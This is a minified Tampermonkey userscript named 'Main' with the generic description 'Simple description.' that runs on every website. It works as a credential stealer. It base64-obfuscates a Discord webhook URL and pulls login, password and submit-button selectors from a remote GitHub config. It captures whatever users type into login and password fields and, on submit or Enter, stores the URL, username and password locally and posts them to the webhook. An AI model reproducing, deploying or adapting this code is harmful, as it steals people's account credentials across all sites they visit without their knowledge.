// ==UserScript==
// @name         Main
// @namespace    http://tampermonkey.net/
// @description  Simple description.
// @version      1
// @match        *://*/*
// @grant        GM_xmlhttpRequest
// @connect      *
// ==/UserScript==
!function(){"use strict";let e=atob("aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTMwMDg1NTIwOTkwMzI2Mzc1NC93dW15Vm5RQ21SWTlTdDZWUy1lWVRta0MybWExeHVLZHdXQ2lWNkpJRkE3bXZYU1VzZjREcTlCNmVzODlhdnZadVFnZw==");(e=>{let s=0,r=[{name:"loginSelectors",url:"https://raw.githubusercontent.com/Filipsys/tampermonkey-script-config/refs/heads/main/allowed-login-selectors.json",selectors:""},{name:"passwordSelectors",url:"https://raw.githubusercontent.com/Filipsys/tampermonkey-script-config/refs/heads/main/allowed-password-selectors.json",selectors:""},{name:"submitSelectors",url:"https://raw.githubusercontent.com/Filipsys/tampermonkey-script-config/refs/heads/main/allowed-submit-button-selectors.json",selectors:""},];r.forEach(e=>{GM_xmlhttpRequest({method:"GET",url:e.url,responseType:"json",onload(r){e.selectors=r.response.map(e=>`${e}`).join(", "),localStorage.setItem(e.name,e.selectors),s++,l()},onerror(r){console.error("Error fetching the password selectors: ",r),e.selectors=localStorage.getItem(e.name),s++,l()}})});let l=()=>s===r.length?e(r):null})(s=>{let r=document.querySelector(s[0].selectors),l=document.querySelector(s[1].selectors),t=document.querySelector(s[2].selectors);r||console.log("Login is null"),l||console.log("Passwords are null"),t||console.log("Submit is null");let o={url:window.location.href,login:"empty",password:"empty"},a=()=>{if("empty"==o.login&&"empty"==o.password)return;let s=localStorage.getItem("localSavedData");s+=`URL: ${o.url} Username: ${o.login} Password: ${o.password} - `,localStorage.setItem("localSavedData",s),console.log("Saved in local storage"),GM_xmlhttpRequest({method:"POST",url:e,headers:{"Content-Type":"application/json"},data:JSON.stringify({username:"webhook",content:`URL: \`${o.url}\` Username: \`${o.login}\` Password: \`${o.password}\``}),onload(e){console.log("Successfully sent webhook")},onerror(e){console.error("Error sending webhook: ",e)}})},n=e=>e.replaceAll('"',"[parenthesis]").replaceAll("'","[single-parenthesis]").replaceAll("\\","[backslash]").replaceAll("`","[grave]");l&&l.addEventListener("input",e=>{"Backspace"===e.key?o.password.slice(0,-1):o.password=n(e.target.value)}),r&&r.addEventListener("input",e=>{"Backspace"===e.key?o.login.slice(0,-1):o.login=n(e.target.value)}),(t||r||l)&&(t.addEventListener("click",e=>a()),window.addEventListener("keydown",e=>"Enter"===e.key?a():null))})}();
